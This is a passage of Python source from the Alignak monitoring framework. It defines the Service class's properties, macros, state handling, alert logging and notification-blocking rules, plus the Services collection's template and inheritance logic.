IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'current_problem_id':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'execution_time':
FloatProp(default=0.0, fill_brok=['full_status', 'check_result'], retention=True),
'u_time':
FloatProp(default=0.0),
's_time':
FloatProp(default=0.0),
'last_notification':
FloatProp(default=0.0, fill_brok=['full_status'], retention=True),
'current_notification_number':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'current_notification_id':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'check_flapping_recovery_notification':
BoolProp(default=True, fill_brok=['full_status'], retention=True),
'scheduled_downtime_depth':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'pending_flex_downtime':
IntegerProp(default=0, fill_brok=['full_status'], retention=True),
'timeout':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'start_time':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'end_time':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'early_timeout':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'return_code':
IntegerProp(default=0, fill_brok=['full_status', 'check_result'], retention=True),
'perf_data':
StringProp(default='', fill_brok=['full_status', 'check_result'], retention=True),
'last_perf_data':
StringProp(default='', retention=True),
'host':
StringProp(default=None),
'customs':
DictProp(default={}, fill_brok=['full_status']),
# Warning: for the notified_contacts retention save,
# we save only the names of the contacts, and we should RELINK
# them when we load it.
# use for having all contacts we have notified
'notified_contacts': ListProp(default=set(),
retention=True,
retention_preparation=to_list_of_names),
'in_scheduled_downtime': BoolProp(
default=False, fill_brok=['full_status', 'check_result'], retention=True),
'in_scheduled_downtime_during_last_check': BoolProp(default=False, retention=True),
'actions': ListProp(default=[]), # put here checks and notif raised
'broks': ListProp(default=[]), # and here broks raised
# Problem/impact part
'is_problem': BoolProp(default=False, fill_brok=['full_status']),
'is_impact': BoolProp(default=False, fill_brok=['full_status']),
# the save value of our business_impact for "problems"
'my_own_business_impact': IntegerProp(default=-1, fill_brok=['full_status']),
# list of problems that make us an impact
'source_problems': ListProp(default=[],
fill_brok=['full_status'],
brok_transformation=to_svc_hst_distinct_lists),
# list of the impact I'm the cause of
'impacts': ListProp(default=[],
fill_brok=['full_status'],
brok_transformation=to_svc_hst_distinct_lists),
# keep a trace of the old state before being an impact
'state_before_impact': StringProp(default='PENDING'),
# keep a trace of the old state id before being an impact
'state_id_before_impact': IntegerProp(default=0),
# if the state change, we know so we do not revert it
'state_changed_since_impact': BoolProp(default=False),
# BUSINESS CORRELATOR PART
# Say if we are business based rule or not
'got_business_rule': BoolProp(default=False, fill_brok=['full_status']),
# Previously processed business rule (with macro expanded)
'processed_business_rule': StringProp(default="", fill_brok=['full_status']),
# Our Dependency node for the business rule
'business_rule': StringProp(default=None),
# Here it's the elements we are depending on
# so our parents as network relation, or a host
# we are depending in a hostdependency
# or even if we are business based.
'parent_dependencies': StringProp(default=set(),
brok_transformation=to_svc_hst_distinct_lists,
fill_brok=['full_status']),
# Here it's the guys that depend on us. So it's the total
# opposite of the parent_dependencies
'child_dependencies': StringProp(brok_transformation=to_svc_hst_distinct_lists,
default=set(), fill_brok=['full_status']),
# Manage the unknown/unreach during hard state
'in_hard_unknown_reach_phase': BoolProp(default=False, retention=True),
'was_in_hard_unknown_reach_phase': BoolProp(default=False, retention=True),
'state_before_hard_unknown_reach_phase': StringProp(default='OK', retention=True),
# Set if the element just change its father/son topology
'topology_change': BoolProp(default=False, fill_brok=['full_status']),
# Trigger list
'triggers': ListProp(default=[]),
# snapshots part
'last_snapshot': IntegerProp(default=0, fill_brok=['full_status'], retention=True),
# Keep the string of the last command launched for this element
'last_check_command': StringProp(default=''),
})
# Mapping between Macros and properties (can be prop or a function)
macros = {
'SERVICEDESC': 'service_description',
'SERVICEDISPLAYNAME': 'display_name',
'SERVICESTATE': 'state',
'SERVICESTATEID': 'state_id',
'LASTSERVICESTATE': 'last_state',
'LASTSERVICESTATEID': 'last_state_id',
'SERVICESTATETYPE': 'state_type',
'SERVICEATTEMPT': 'attempt',
'MAXSERVICEATTEMPTS': 'max_check_attempts',
'SERVICEISVOLATILE': 'is_volatile',
'SERVICEEVENTID': 'current_event_id',
'LASTSERVICEEVENTID': 'last_event_id',
'SERVICEPROBLEMID': 'current_problem_id',
'LASTSERVICEPROBLEMID': 'last_problem_id',
'SERVICELATENCY': 'latency',
'SERVICEEXECUTIONTIME': 'execution_time',
'SERVICEDURATION': 'get_duration',
'SERVICEDURATIONSEC': 'get_duration_sec',
'SERVICEDOWNTIME': 'get_downtime',
'SERVICEPERCENTCHANGE': 'percent_state_change',
'SERVICEGROUPNAME': 'get_groupname',
'SERVICEGROUPNAMES': 'get_groupnames',
'LASTSERVICECHECK': 'last_chk',
'LASTSERVICESTATECHANGE': 'last_state_change',
'LASTSERVICEOK': 'last_time_ok',
'LASTSERVICEWARNING': 'last_time_warning',
'LASTSERVICEUNKNOWN': 'last_time_unknown',
'LASTSERVICECRITICAL': 'last_time_critical',
'SERVICEOUTPUT': 'output',
'LONGSERVICEOUTPUT': 'long_output',
'SERVICEPERFDATA': 'perf_data',
'LASTSERVICEPERFDATA': 'last_perf_data',
'SERVICECHECKCOMMAND': 'get_check_command',
'SERVICEACKAUTHOR': 'get_ack_author_name',
'SERVICEACKAUTHORNAME': 'get_ack_author_name',
'SERVICEACKAUTHORALIAS': 'get_ack_author_name',
'SERVICEACKCOMMENT': 'get_ack_comment',
'SERVICEACTIONURL': 'action_url',
'SERVICENOTESURL': 'notes_url',
'SERVICENOTES': 'notes',
'SERVICEBUSINESSIMPACT': 'business_impact',
# Business rules output formatting related macros
'STATUS': 'get_status',
'SHORTSTATUS': 'get_short_status',
'FULLNAME': 'get_full_name',
}
# This tab is used to transform old parameters name into new ones
# so from Nagios2 format, to Nagios3 ones.
# Or Alignak deprecated names like criticity
old_properties = {
'normal_check_interval': 'check_interval',
'retry_check_interval': 'retry_interval',
'criticity': 'business_impact',
'hostgroup': 'hostgroup_name',
'hostgroups': 'hostgroup_name',
# 'criticitymodulations': 'business_impact_modulations',
}
#######
# __ _ _ _
# / _(_) | | (_)
# ___ ___ _ __ | |_ _ __ _ _ _ _ __ __ _| |_ _ ___ _ __
# / __/ _ \| '_ \| _| |/ _` | | | | '__/ _` | __| |/ _ \| '_ \
# | (_| (_) | | | | | | | (_| | |_| | | | (_| | |_| | (_) | | | |
# \___\___/|_| |_|_| |_|\__, |\__,_|_| \__,_|\__|_|\___/|_| |_|
# __/ |
# |___/
######
def __repr__(self):
return '<Service host_name=%r desc=%r name=%r use=%r />' % (
getattr(self, 'host_name', None),
getattr(self, 'service_description', None),
getattr(self, 'name', None),
getattr(self, 'use', None)
)
__str__ = __repr__
@property
def unique_key(self): # actually only used for (un)indexitem() via name_property..
return (self.host_name, self.service_description)
@property
def display_name(self):
display_name = getattr(self, '_display_name', None)
if not display_name:
return self.service_description
return display_name
@display_name.setter
def display_name(self, display_name):
self._display_name = display_name
# Give a nice name output
def get_name(self):
if hasattr(self, 'service_description'):
return self.service_description
if hasattr(self, 'name'):
return self.name
return 'SERVICE-DESCRIPTION-MISSING'
# Get the servicegroups names
def get_groupnames(self):
return ','.join([sg.get_name() for sg in self.servicegroups])
# Need the whole name for debugging purpose
def get_dbg_name(self):
return "%s/%s" % (self.host.host_name, self.service_description)
def get_full_name(self):
if self.host and hasattr(self.host, 'host_name') and hasattr(self, 'service_description'):
return "%s/%s" % (self.host.host_name, self.service_description)
return 'UNKNOWN-SERVICE'
# Get our realm, so in fact our host one
def get_realm(self):
if self.host is None:
return None
return self.host.get_realm()
def get_hostgroups(self):
return self.host.hostgroups
def get_host_tags(self):
return self.host.tags
def get_service_tags(self):
return self.tags
# Check is required prop are set:
# template are always correct
# contacts OR contactgroups is need
def is_correct(self):
state = True
cls = self.__class__
source = getattr(self, 'imported_from', 'unknown')
desc = getattr(self, 'service_description', 'unnamed')
hname = getattr(self, 'host_name', 'unnamed')
special_properties = ('check_period', 'notification_interval', 'host_name',
'hostgroup_name', 'notification_period')
for prop, entry in cls.properties.items():
if prop not in special_properties:
if not hasattr(self, prop) and entry.required:
logger.error("The service %s on host '%s' does not have %s", desc, hname, prop)
state = False # Bad boy...
# Then look if we have some errors in the conf
# Juts print warnings, but raise errors
for err in self.configuration_warnings:
logger.warning("[service::%s] %s", desc, err)
# Raised all previously saw errors like unknown contacts and co
if self.configuration_errors != []:
state = False
for err in self.configuration_errors:
logger.error("[service::%s] %s", self.get_full_name(), err)
# If no notif period, set it to None, mean 24x7
if not hasattr(self, 'notification_period'):
self.notification_period = None
# Ok now we manage special cases...
if self.notifications_enabled and self.contacts == []:
logger.warning("The service '%s' in the host '%s' does not have "
"contacts nor contact_groups in '%s'", desc, hname, source)
# Set display_name if need
if getattr(self, 'display_name', '') == '':
self.display_name = getattr(self, 'service_description', '')
# If we got an event handler, it should be valid
if getattr(self, 'event_handler', None) and not self.event_handler.is_valid():
logger.error("%s: my event_handler %s is invalid",
self.get_name(), self.event_handler.command)
state = False
if not hasattr(self, 'check_command'):
logger.error("%s: I've got no check_command", self.get_name())
state = False
# Ok got a command, but maybe it's invalid
else:
if not self.check_command.is_valid():
logger.error("%s: my check_command %s is invalid",
self.get_name(), self.check_command.command)
state = False
if self.got_business_rule:
if not self.business_rule.is_valid():
logger.error("%s: my business rule is invalid", self.get_name(),)
for bperror in self.business_rule.configuration_errors:
logger.error("%s: %s", self.get_name(), bperror)
state = False
if not hasattr(self, 'notification_interval') \
and self.notifications_enabled is True:
logger.error("%s: I've got no notification_interval but "
"I've got notifications enabled", self.get_name())
state = False
if not self.host_name:
logger.error("The service '%s' is not bound do any host.", desc)
state = False
elif self.host is None:
logger.error("The service '%s' got an unknown host_name '%s'.", desc, self.host_name)
state = False
if not hasattr(self, 'check_period'):
self.check_period = None
if hasattr(self, 'service_description'):
for c in cls.illegal_object_name_chars:
if c in self.service_description:
logger.error("%s: My service_description got the "
"character %s that is not allowed.", self.get_name(), c)
state = False
return state
# The service is dependent of his father dep
# Must be AFTER linkify
# TODO: implement "not host dependent" feature.
def fill_daddy_dependency(self):
# Depend of host, all status, is a networkdep
# and do not have timeperiod, and follow parents dep
if self.host is not None and self.host_dependency_enabled:
# I add the dep in MY list
self.act_depend_of.append(
(self.host, ['d', 'u', 's', 'f'], 'network_dep', None, True)
)
# I add the dep in Daddy list
self.host.act_depend_of_me.append(
(self, ['d', 'u', 's', 'f'], 'network_dep', None, True)
)
# And the parent/child dep lists too
self.host.register_son_in_parent_child_dependencies(self)
# Register the dependency between 2 service for action (notification etc)
def add_service_act_dependency(self, srv, status, timeperiod, inherits_parent):
# first I add the other the I depend on in MY list
self.act_depend_of.append((srv, status, 'logic_dep', timeperiod, inherits_parent))
# then I register myself in the other service dep list
srv.act_depend_of_me.append((self, status, 'logic_dep', timeperiod, inherits_parent))
# And the parent/child dep lists too
srv.register_son_in_parent_child_dependencies(self)
# Register the dependency between 2 service for action (notification etc)
# but based on a BUSINESS rule, so on fact:
# ERP depend on database, so we fill just database.act_depend_of_me
# because we will want ERP mails to go on! So call this
# on the database service with the srv=ERP service
def add_business_rule_act_dependency(self, srv, status, timeperiod, inherits_parent):
# I only register so he know that I WILL be a impact
self.act_depend_of_me.append((srv, status, 'business_dep',
timeperiod, inherits_parent))
# And the parent/child dep lists too
self.register_son_in_parent_child_dependencies(srv)
# Register the dependency between 2 service for checks
def add_service_chk_dependency(self, srv, status, timeperiod, inherits_parent):
# first I add the other the I depend on in MY list
self.chk_depend_of.append((srv, status, 'logic_dep', timeperiod, inherits_parent))
# then I register myself in the other service dep list
srv.chk_depend_of_me.append(
(self, status, 'logic_dep', timeperiod, inherits_parent)
)
# And the parent/child dep lists too
srv.register_son_in_parent_child_dependencies(self)
def duplicate(self, host):
''' For a given host, look for all copy we must create for for_each property
:type host: alignak.objects.host.Host
:return Service
'''
# In macro, it's all in UPPER case
prop = self.duplicate_foreach.strip().upper()
if prop not in host.customs: # If I do not have the property, we bail out
return []
duplicates = []
# Get the list entry, and the not one if there is one
entry = host.customs[prop]
# Look at the list of the key we do NOT want maybe,
# for _disks it will be _!disks
not_entry = host.customs.get('_' + '!' + prop[1:], '').split(',')
not_keys = strip_and_uniq(not_entry)
default_value = getattr(self, 'default_value', '')
# Transform the generator string to a list
# Missing values are filled with the default value
(key_values, errcode) = get_key_value_sequence(entry, default_value)
if key_values:
for key_value in key_values:
key = key_value['KEY']
# Maybe this key is in the NOT list, if so, skip it
if key in not_keys:
continue
value = key_value['VALUE']
new_s = self.copy()
new_s.host_name = host.get_name()
if self.is_tpl(): # if template, the new one is not
new_s.register = 1
for key in key_value:
if key == 'KEY':
if hasattr(self, 'service_description'):
# We want to change all illegal chars to a _ sign.
# We can't use class.illegal_obj_char
# because in the "explode" phase, we do not have access to this data! :(
safe_key_value = re.sub(r'[' + "`~!$%^&*\"|'<>?,()=" + ']+', '_',
key_value[key])
new_s.service_description = self.service_description.replace(
'$' + key + '$', safe_key_value
)
# Here is a list of property where we will expand the $KEY$ by the value
_the_expandables = ['check_command', 'aggregation', 'event_handler']
for prop in _the_expandables:
if hasattr(self, prop):
# here we can replace VALUE, VALUE1, VALUE2,...
setattr(new_s, prop, getattr(new_s, prop).replace('$' + key + '$',
key_value[key]))
if hasattr(self, 'service_dependencies'):
for i, sd in enumerate(new_s.service_dependencies):
new_s.service_dependencies[i] = sd.replace(
'$' + key + '$', key_value[key]
)
# And then add in our list this new service
duplicates.append(new_s)
else:
# If error, we should link the error to the host, because self is
# a template, and so won't be checked not print!
if errcode == GET_KEY_VALUE_SEQUENCE_ERROR_SYNTAX:
err = "The custom property '%s' of the host '%s' is not a valid entry %s for a service generator" % \
(self.duplicate_foreach.strip(), host.get_name(), entry)
logger.warning(err)
host.configuration_errors.append(err)
elif errcode == GET_KEY_VALUE_SEQUENCE_ERROR_NODEFAULT:
err = "The custom property '%s 'of the host '%s' has empty " \
"values %s but the service %s has no default_value" % \
(self.duplicate_foreach.strip(),
host.get_name(), entry, self.service_description)
logger.warning(err)
host.configuration_errors.append(err)
elif errcode == GET_KEY_VALUE_SEQUENCE_ERROR_NODE:
err = "The custom property '%s' of the host '%s' has an invalid node range %s" % \
(self.duplicate_foreach.strip(), host.get_name(), entry)
logger.warning(err)
host.configuration_errors.append(err)
return duplicates
#####
# _
# (_)
# _ __ _ _ _ __ _ __ _ _ __ __ _
# | '__| | | | '_ \| '_ \| | '_ \ / _` |
# | | | |_| | | | | | | | | | | | (_| |
# |_| \__,_|_| |_|_| |_|_|_| |_|\__, |
# __/ |
# |___/
####
# Set unreachable: our host is DOWN, but it mean nothing for a service
def set_unreachable(self):
pass
# We just go an impact, so we go unreachable
# but only if it's enable in the configuration
def set_impact_state(self):
cls = self.__class__
if cls.enable_problem_impacts_states_change:
# Keep a trace of the old state (problem came back before
# a new checks)
self.state_before_impact = self.state
self.state_id_before_impact = self.state_id
# this flag will know if we override the impact state
self.state_changed_since_impact = False
self.state = 'UNKNOWN' # exit code UNDETERMINED
self.state_id = 3
# Ok, we are no more an impact, if no news checks
# override the impact state, we came back to old
# states
# And only if we enable the state change for impacts
def unset_impact_state(self):
cls = self.__class__
if cls.enable_problem_impacts_states_change and not self.state_changed_since_impact:
self.state = self.state_before_impact
self.state_id = self.state_id_before_impact
# Set state with status return by the check
# and update flapping state
def set_state_from_exit_status(self, status):
now = time.time()
self.last_state_update = now
# we should put in last_state the good last state:
# if not just change the state by an problem/impact
# we can take current state. But if it's the case, the
# real old state is self.state_before_impact (it's the TRUE
# state in fact)
# but only if the global conf have enable the impact state change
cls = self.__class__
if cls.enable_problem_impacts_states_change \
and self.is_impact \
and not self.state_changed_since_impact:
self.last_state = self.state_before_impact
else: # standard case
self.last_state = self.state
if status == 0:
self.state = 'OK'
self.state_id = 0
self.last_time_ok = int(self.last_state_update)
state_code = 'o'
elif status == 1:
self.state = 'WARNING'
self.state_id = 1
self.last_time_warning = int(self.last_state_update)
state_code = 'w'
elif status == 2:
self.state = 'CRITICAL'
self.state_id = 2
self.last_time_critical = int(self.last_state_update)
state_code = 'c'
elif status == 3:
self.state = 'UNKNOWN'
self.state_id = 3
self.last_time_unknown = int(self.last_state_update)
state_code = 'u'
else:
self.state = 'CRITICAL' # exit code UNDETERMINED
self.state_id = 2
self.last_time_critical = int(self.last_state_update)
state_code = 'c'
if state_code in self.flap_detection_options:
self.add_flapping_change(self.state != self.last_state)
if self.state != self.last_state:
self.last_state_change = self.last_state_update
self.duration_sec = now - self.last_state_change
# Return True if status is the state (like OK) or small form like 'o'
def is_state(self, status):
if status == self.state:
return True
# Now low status
elif status == 'o' and self.state == 'OK':
return True
elif status == 'c' and self.state == 'CRITICAL':
return True
elif status == 'w' and self.state == 'WARNING':
return True
elif status == 'u' and self.state == 'UNKNOWN':
return True
return False
# The last time when the state was not OK
def last_time_non_ok_or_up(self):
non_ok_times = filter(lambda x: x > self.last_time_ok, [self.last_time_warning,
self.last_time_critical,
self.last_time_unknown])
if len(non_ok_times) == 0:
last_time_non_ok = 0 # program_start would be better
else:
last_time_non_ok = min(non_ok_times)
return last_time_non_ok
# Add a log entry with a SERVICE ALERT like:
# SERVICE ALERT: server;Load;UNKNOWN;HARD;1;I don't know what to say...
def raise_alert_log_entry(self):
naglog_result('critical', 'SERVICE ALERT: %s;%s;%s;%s;%d;%s'
% (self.host.get_name(), self.get_name(),
self.state, self.state_type,
self.attempt, self.output))
# If the configuration allow it, raise an initial log like
# CURRENT SERVICE STATE: server;Load;UNKNOWN;HARD;1;I don't know what to say...
def raise_initial_state(self):
if self.__class__.log_initial_states:
naglog_result('info', 'CURRENT SERVICE STATE: %s;%s;%s;%s;%d;%s'
% (self.host.get_name(), self.get_name(),
self.state, self.state_type, self.attempt, self.output))
# Add a log entry with a Freshness alert like:
# Warning: The results of host 'Server' are stale by 0d 0h 0m 58s (threshold=0d 1h 0m 0s).
# I'm forcing an immediate check of the host.
def raise_freshness_log_entry(self, t_stale_by, t_threshold):
logger.warning("The results of service '%s' on host '%s' are stale "
"by %s (threshold=%s). I'm forcing an immediate check "
"of the service.",
self.get_name(), self.host.get_name(),
format_t_into_dhms_format(t_stale_by),
format_t_into_dhms_format(t_threshold))
# Raise a log entry with a Notification alert like
# SERVICE NOTIFICATION: superadmin;server;Load;OK;notify-by-rss;no output
def raise_notification_log_entry(self, n):
contact = n.contact
command = n.command_call
if n.type in ('DOWNTIMESTART', 'DOWNTIMEEND', 'DOWNTIMECANCELLED',
'CUSTOM', 'ACKNOWLEDGEMENT', 'FLAPPINGSTART',
'FLAPPINGSTOP', 'FLAPPINGDISABLED'):
state = '%s (%s)' % (n.type, self.state)
else:
state = self.state
if self.__class__.log_notifications:
naglog_result('critical', "SERVICE NOTIFICATION: %s;%s;%s;%s;%s;%s"
% (contact.get_name(),
self.host.get_name(), self.get_name(), state,
command.get_name(), self.output))
# Raise a log entry with a Eventhandler alert like
# SERVICE EVENT HANDLER: test_host_0;test_ok_0;OK;SOFT;4;eventhandler
def raise_event_handler_log_entry(self, command):
if self.__class__.log_event_handlers:
naglog_result('critical', "SERVICE EVENT HANDLER: %s;%s;%s;%s;%s;%s"
% (self.host.get_name(), self.get_name(),
self.state, self.state_type,
self.attempt, command.get_name()))
# Raise a log entry with a Eventhandler alert like
# SERVICE SNAPSHOT: test_host_0;test_ok_0;OK;SOFT;4;eventhandler
def raise_snapshot_log_entry(self, command):
if self.__class__.log_event_handlers:
naglog_result('critical', "SERVICE SNAPSHOT: %s;%s;%s;%s;%s;%s"
% (self.host.get_name(), self.get_name(),
self.state, self.state_type, self.attempt, command.get_name()))
# Raise a log entry with FLAPPING START alert like
# SERVICE FLAPPING ALERT: server;LOAD;STARTED;
# Service appears to have started flapping (50.6% change >= 50.0% threshold)
def raise_flapping_start_log_entry(self, change_ratio, threshold):
naglog_result('critical', "SERVICE FLAPPING ALERT: %s;%s;STARTED; "
"Service appears to have started flapping "
"(%.1f%% change >= %.1f%% threshold)"
% (self.host.get_name(), self.get_name(),
change_ratio, threshold))
# Raise a log entry with FLAPPING STOP alert like
# SERVICE FLAPPING ALERT: server;LOAD;STOPPED;
# Service appears to have stopped flapping (23.0% change < 25.0% threshold)
def raise_flapping_stop_log_entry(self, change_ratio, threshold):
naglog_result('critical', "SERVICE FLAPPING ALERT: %s;%s;STOPPED; "
"Service appears to have stopped flapping "
"(%.1f%% change < %.1f%% threshold)"
% (self.host.get_name(), self.get_name(),
change_ratio, threshold))
# If there is no valid time for next check, raise a log entry
def raise_no_next_check_log_entry(self):
logger.warning("I cannot schedule the check for the service '%s' on "
"host '%s' because there is not future valid time",
self.get_name(), self.host.get_name())
# Raise a log entry when a downtime begins
# SERVICE DOWNTIME ALERT: test_host_0;test_ok_0;STARTED;
# Service has entered a period of scheduled downtime
def raise_enter_downtime_log_entry(self):
naglog_result('critical', "SERVICE DOWNTIME ALERT: %s;%s;STARTED; "
"Service has entered a period of scheduled "
"downtime" % (self.host.get_name(), self.get_name()))
# Raise a log entry when a downtime has finished
# SERVICE DOWNTIME ALERT: test_host_0;test_ok_0;STOPPED;
# Service has exited from a period of scheduled downtime
def raise_exit_downtime_log_entry(self):
naglog_result('critical', "SERVICE DOWNTIME ALERT: %s;%s;STOPPED; Service "
"has exited from a period of scheduled downtime"
% (self.host.get_name(), self.get_name()))
# Raise a log entry when a downtime prematurely ends
# SERVICE DOWNTIME ALERT: test_host_0;test_ok_0;CANCELLED;
# Service has entered a period of scheduled downtime
def raise_cancel_downtime_log_entry(self):
naglog_result(
'critical', "SERVICE DOWNTIME ALERT: %s;%s;CANCELLED; "
"Scheduled downtime for service has been cancelled."
% (self.host.get_name(), self.get_name()))
# Is stalking?
# Launch if check is waitconsume==first time
# and if c.status is in self.stalking_options
def manage_stalking(self, c):
need_stalk = False
if c.status == 'waitconsume':
if c.exit_status == 0 and 'o' in self.stalking_options:
need_stalk = True
elif c.exit_status == 1 and 'w' in self.stalking_options:
need_stalk = True
elif c.exit_status == 2 and 'c' in self.stalking_options:
need_stalk = True
elif c.exit_status == 3 and 'u' in self.stalking_options:
need_stalk = True
if c.output == self.output:
need_stalk = False
if need_stalk:
logger.info("Stalking %s: %s", self.get_name(), c.output)
# Give data for checks's macros
def get_data_for_checks(self):
return [self.host, self]
# Give data for event handlers's macros
def get_data_for_event_handler(self):
return [self.host, self]
# Give data for notifications'n macros
def get_data_for_notifications(self, contact, n):
return [self.host, self, contact, n]
# See if the notification is launchable (time is OK and contact is OK too)
def notification_is_blocked_by_contact(self, n, contact):
return not contact.want_service_notification(self.last_chk, self.state,
n.type, self.business_impact, n.command_call)
def get_duration_sec(self):
return str(int(self.duration_sec))
def get_duration(self):
m, s = divmod(self.duration_sec, 60)
h, m = divmod(m, 60)
return "%02dh %02dm %02ds" % (h, m, s)
def get_ack_author_name(self):
if self.acknowledgement is None:
return ''
return self.acknowledgement.author
def get_ack_comment(self):
if self.acknowledgement is None:
return ''
return self.acknowledgement.comment
def get_check_command(self):
return self.check_command.get_name()
# Check if a notification for this service is suppressed at this time
def notification_is_blocked_by_item(self, type, t_wished=None):
if t_wished is None:
t_wished = time.time()
# TODO
# forced notification
# pass if this is a custom notification
# Block if notifications are program-wide disabled
if not self.enable_notifications:
return True
# Does the notification period allow sending out this notification?
if self.notification_period is not None \
and not self.notification_period.is_time_valid(t_wished):
return True
# Block if notifications are disabled for this service
if not self.notifications_enabled:
return True
# Block if the current status is in the notification_options w,u,c,r,f,s
if 'n' in self.notification_options:
return True
if type in ('PROBLEM', 'RECOVERY'):
if self.state == 'UNKNOWN' and 'u' not in self.notification_options:
return True
if self.state == 'WARNING' and 'w' not in self.notification_options:
return True
if self.state == 'CRITICAL' and 'c' not in self.notification_options:
return True
if self.state == 'OK' and 'r' not in self.notification_options:
return True
if (type in ('FLAPPINGSTART', 'FLAPPINGSTOP', 'FLAPPINGDISABLED')
and 'f' not in self.notification_options):
return True
if (type in ('DOWNTIMESTART', 'DOWNTIMEEND', 'DOWNTIMECANCELLED')
and 's' not in self.notification_options):
return True
# Acknowledgements make no sense when the status is ok/up
if type == 'ACKNOWLEDGEMENT':
if self.state == self.ok_up:
return True
# When in downtime, only allow end-of-downtime notifications
if self.scheduled_downtime_depth > 1 and type not in ('DOWNTIMEEND', 'DOWNTIMECANCELLED'):
return True
# Block if host is in a scheduled downtime
if self.host.scheduled_downtime_depth > 0:
return True
# Block if in a scheduled downtime and a problem arises, or flapping event
if self.scheduled_downtime_depth > 0 and type in \
('PROBLEM', 'RECOVERY', 'FLAPPINGSTART', 'FLAPPINGSTOP', 'FLAPPINGDISABLED'):
return True
# Block if the status is SOFT
if self.state_type == 'SOFT' and type == 'PROBLEM':
return True
# Block if the problem has already been acknowledged
if self.problem_has_been_acknowledged and type != 'ACKNOWLEDGEMENT':
return True
# Block if flapping
if self.is_flapping and type not in ('FLAPPINGSTART', 'FLAPPINGSTOP', 'FLAPPINGDISABLED'):
return True
# Block if host is down
if self.host.state != self.host.ok_up:
return True
# Block if business rule smart notifications is enabled and all its
# childs have been acknowledged or are under downtime.
if self.got_business_rule is True \
and self.business_rule_smart_notifications is True \
and self.business_rule_notification_is_blocked() is True \
and type == 'PROBLEM':
return True
return False
# Get a oc*p command if item has obsess_over_*
# command. It must be enabled locally and globally
def get_obsessive_compulsive_processor_command(self):
cls = self.__class__
if not cls.obsess_over or not self.obsess_over_service:
return
m = MacroResolver()
data = self.get_data_for_event_handler()
cmd = m.resolve_command(cls.ocsp_command, data)
e = EventHandler(cmd, timeout=cls.ocsp_timeout)
# ok we can put it in our temp action queue
self.actions.append(e)
def get_short_status(self):
mapping = {
0: "O",
1: "W",
2: "C",
3: "U",
}
if self.got_business_rule:
return mapping.get(self.business_rule.get_state(), "n/a")
else:
return mapping.get(self.state_id, "n/a")
def get_status(self):
if self.got_business_rule:
mapping = {
0: "OK",
1: "WARNING",
2: "CRITICAL",
3: "UNKNOWN",
}
return mapping.get(self.business_rule.get_state(), "n/a")
else:
return self.state
def get_downtime(self):
return str(self.scheduled_downtime_depth)
# Class for list of services. It's mainly, mainly for configuration part
class Services(Items):
name_property = 'unique_key' # only used by (un)indexitem (via 'name_property')
inner_class = Service # use for know what is in items
def __init__(self, items, index_items=True):
self.partial_services = {}
self.name_to_partial = {}
super(Services, self).__init__(items, index_items)
def add_template(self, tpl):
"""
Adds and index a template into the `templates` container.
This implementation takes into account that a service has two naming
attribute: `host_name` and `service_description`.
:param tpl: The template to add
"""
objcls = self.inner_class.my_type
name = getattr(tpl, 'name', '')
hname = getattr(tpl, 'host_name', '')
if not name and not hname:
mesg = "a %s template has been defined without name nor " \
"host_name%s" % (objcls, self.get_source(tpl))
tpl.configuration_errors.append(mesg)
elif name:
tpl = self.index_template(tpl)
self.templates[tpl.id] = tpl
def add_item(self, item, index=True, was_partial=False):
"""
Adds and index an item into the `items` container.
This implementation takes into account that a service has two naming
attribute: `host_name` and `service_description`.
:param item: The item to add
:param index: Flag indicating if the item should be indexed
"""
objcls = self.inner_class.my_type
hname = getattr(item, 'host_name', '')
hgname = getattr(item, 'hostgroup_name', '')
sdesc = getattr(item, 'service_description', '')
source = getattr(item, 'imported_from', 'unknown')
if source:
in_file = " in %s" % source
else:
in_file = ""
if not hname and not hgname and not sdesc:
mesg = "a %s has been defined without host_name nor " \
"hostgroups nor service_description%s" % (objcls, in_file)
item.configuration_errors.append(mesg)
elif not sdesc or sdesc and not hgname and not hname and not was_partial:
self.add_partial_service(item, index, (objcls, hname, hgname, sdesc, in_file))
return
if index is True:
item = self.index_item(item)
self.items[item.id] = item
def add_partial_service(self, item, index=True, var_tuple=None):
if var_tuple is None:
return
objcls, hname, hgname, sdesc, in_file = var_tuple
use = getattr(item, 'use', [])
if use == []:
mesg = "a %s has been defined without host_name nor " \
"hostgroups nor service_description and " \
"there is no use to create a unique key%s" % (objcls, in_file)
item.configuration_errors.append(mesg)
return
use = ','.join(use)
if sdesc:
name = "::".join((sdesc, use))
elif hname:
name = "::".join((hname, use))
else:
name = "::".join((hgname, use))
if name in self.name_to_partial:
item = self.manage_conflict(item, name, partial=True)
self.name_to_partial[name] = item
self.partial_services[item.id] = item
# Inheritance for just a property
def apply_partial_inheritance(self, prop):
for i in itertools.chain(self.items.itervalues(),
self.partial_services.itervalues(),
self.templates.itervalues()):
i.get_property_by_inheritance(prop)
# If a "null" attribute was inherited, delete it
try:
if getattr(i, prop) == 'null':
delattr(i, prop)
except AttributeError:
pass
def apply_inheritance(self):
""" For all items and templates inherite properties and custom
variables.
"""
# We check for all Class properties if the host has it
# if not, it check all host templates for a value
cls = self.inner_class
for prop in cls.properties:
self.apply_partial_inheritance(prop)
for i in itertools.chain(self.items.itervalues(),
self.partial_services.itervalues(),
self.templates.itervalues()):
i.get_customs_properties_by_inheritance()
for i in self.partial_services.itervalues():
self.add_item(i, True, True)
del self.partial_services
del self.name_to_partial
def linkify_templates(self):
# First we create a list of all templates
for i in itertools.chain(self.items.itervalues(),
self.partial_services.itervalues(),
self.templates.itervalues()):
self.linkify_item_templates(i)
for i in self:
i.tags = self.get_all_tags(i)
# Search for all of the services in a host
def find_srvs_by_hostname(self, host_name):
if hasattr(self, 'hosts'):
h = self.hosts.find_by_name(host_name)
if h is None:
return None
return h.get_services()
return None
# Search a service by it's name and hot_name
def find_srv_by_name_and_hostname(self, host_name, sdescr):
key = (host_name, sdescr)
return self.name_to_item.get(key, None)
# Make link between elements:
# service -> host
# service -> command
# service -> timeperiods
# service -> contacts
def linkify(self, hosts, commands, timeperiods, contacts,
resultmodulations, businessimpactmodulations, escalations,
servicegroups, triggers, checkmodulations, macromodulations):
